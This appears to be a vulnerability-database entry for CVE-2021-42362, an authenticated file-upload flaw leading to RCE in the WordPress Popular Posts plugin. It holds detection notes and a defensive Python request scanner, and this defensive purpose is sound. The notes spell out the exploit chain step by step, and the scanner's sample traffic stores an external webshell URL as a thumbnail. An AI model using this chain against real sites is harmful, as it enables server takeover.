CVE-2021-42362
Published: 2021-11-17
Priority: P2 · 78 · high · CVSS 3.1: 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: available · EPSS: 79.82% (99.6th percentile)
The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wordpress_popular_posts | wordpress_popular_posts | 0.0 – 5.3.2 | — |
| wordpress_popular_posts_project | wordpress_popular_posts | <= 5.3.2 | — |
Detection & IOCs (extracted from sources)
- bytes: GIF header prepended to PHP payload
- Monitor POST requests to wp-admin/admin-ajax.php with action=add-meta and metakeyselect=wpp_thumbnail containing an external URL as the metavalue — this is the step that registers the remote shell URL as the post thumbnail custom field.
- Alert on files with double extensions (e.g. .gif.php) appearing under wp-content/uploads/wordpress-popular-posts/ — the exploit drops the webshell there after the plugin fetches and saves the remote payload.
- Detect outbound server-side HTTP requests originating from the WordPress process to external hosts for files with .gif.php or similar double-extension names — the plugin fetches the attacker-hosted payload automatically.
- Flag POST requests to wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools with body parameter thumb_source=custom_field — this reconfigures the plugin to accept arbitrary URLs for thumbnails, a prerequisite step in the exploit chain.
- Detect HTTP requests with User-Agent 'Monies Browser 1.0' targeting WordPress login and admin endpoints — this is the hardcoded UA string used by the public exploit script.
- Monitor POST requests to wp-admin/admin-ajax.php with action=wpp_clear_thumbnail — this cache-clearing step is performed by the exploit immediately before triggering the malicious thumbnail download.
- Rapid repeated GET requests to the same post URL (10 times in quick succession) followed by POSTs to /wp-json/wordpress-popular-posts/v1/popular-posts with wpp_id matching that post — this is the view-inflation step used to push the malicious post into the top-5 widget.
- The exploit requires the Metasploit payload server to be reachable on port 80, 443, or 8080 with a FQDN resolving to a non-RFC1918 address; monitor for WordPress servers making outbound connections to non-private IPs on these ports fetching image-like filenames.
- The attacker must hold at least Contributor-level WordPress credentials — unauthenticated exploitation is not possible.
- There is a ~90-second wait built into the exploit chain to allow the server-side Popular Posts cache (60 sec refresh) to expire before the widget loads and triggers the payload download.
- The attacker-hosted payload server must respond to a HEAD request before the GET — defenders can use this two-phase fetch pattern as a detection signal.
- Affects WordPress Popular Posts plugin versions up to and including 5.3.2 only.
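A defender-side check for the request signals listed above, added here as an example and not taken from the page, the exploit or the plugin: it walks a constructed request sequence (method, URL, form body, User-Agent, as a WAF or application hook would see it) and flags the chain steps. The `?p=<id>` post-URL form used to tie `wpp_id` back to the inflated post is an assumption.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Indicators from the detection notes above; assumes post URLs use the ?p=<id> form.
EXPLOIT_UA = "Monies Browser 1.0"
UPLOAD_DIR = "/wp-content/uploads/wordpress-popular-posts/"
DOUBLE_EXT = re.compile(r"\.[a-z0-9]{2,4}\.php$", re.I)
WPP_API = "/wp-json/wordpress-popular-posts/v1/popular-posts"
VIEW_BURST = 10  # repeated GETs to one post before the wpp_id POST

def params(url, body):  # query-string and form-body parameters, flattened
    merged = {**parse_qs(urlsplit(url).query), **parse_qs(body)}
    return {k: v[0] for k, v in merged.items()}

def scan(requests):
    """Return (index, indicator) pairs; requests are (method, url, body, user_agent)."""
    hits, get_counts = [], Counter()
    for i, (method, url, body, ua) in enumerate(requests):
        path, p = urlsplit(url).path, params(url, body)
        if ua == EXPLOIT_UA:
            hits.append((i, "exploit-script User-Agent"))
        if (method == "POST" and path.endswith("/options-general.php")
                and p.get("page") == "wordpress-popular-posts"
                and p.get("thumb_source") == "custom_field"):
            hits.append((i, "thumb_source switched to custom_field"))
        if (method == "POST" and path.endswith("/admin-ajax.php")
                and p.get("action") == "add-meta" and p.get("metakeyselect") == "wpp_thumbnail"
                and p.get("metavalue", "").lower().startswith(("http://", "https://"))):
            hits.append((i, "external URL stored as wpp_thumbnail"))
        if path.startswith(UPLOAD_DIR) and DOUBLE_EXT.search(path):
            hits.append((i, "double-extension file under plugin uploads"))
        if method == "GET":
            get_counts[url] += 1
        elif (method == "POST" and path == WPP_API
                and get_counts[f"/?p={p.get('wpp_id')}"] >= VIEW_BURST):
            hits.append((i, f"view inflation for wpp_id {p['wpp_id']}"))
    return hits

# Constructed sample traffic (not real logs) that walks the chain once.
SAMPLE = [
    ("POST", "/wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools",
     "thumb_source=custom_field", EXPLOIT_UA),
    ("POST", "/wp-admin/admin-ajax.php", "action=add-meta&metakeyselect=wpp_thumbnail"
     "&metavalue=http://203.0.113.9/pic.gif.php", EXPLOIT_UA),
] + [("GET", "/?p=42", "", "Mozilla/5.0")] * VIEW_BURST + [
    ("POST", WPP_API, "wpp_id=42", "Mozilla/5.0"),
    ("GET", UPLOAD_DIR + "pic.gif.php", "", "Mozilla/5.0"),
    ("GET", "/about/", "", "Mozilla/5.0"),  # benign request, no indicator
]
```

Any single indicator is noisy on its own; the value is in seeing several of them from one account or client within the ~90-second window the notes describe.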
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
No detection rules found.
Exploit-DB
WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated) (CVE-2021-42362, HIGH; exploitdb · 2021-07-15 · CVSS 8.8)
---
```text
# Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 15/07/2021
# Exploit Author: Simone Cristofaro
# Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/
# Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip
# Version: 5.3.2 or below
# Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27
# CVE: CVE-2021-42362
# Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/
# Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is
# enabled (otherwise WPP can't generate thumbnails). A
```
Metasploit
Wordpress Popular Posts Authenticated RCE (metasploit)
This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/165376/WordPress-Popular-Posts-5.3.2-Remote-Code-Execution.html
- https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/
- https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601
- https://plugins.trac.wordpress.org/changeset/2542638/wordpress-popular-posts/trunk/src/Image.php
- https://wpscan.com/vulnerability/bd4f157c-a3d7-4535-a587-0102ba4e3009
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-42362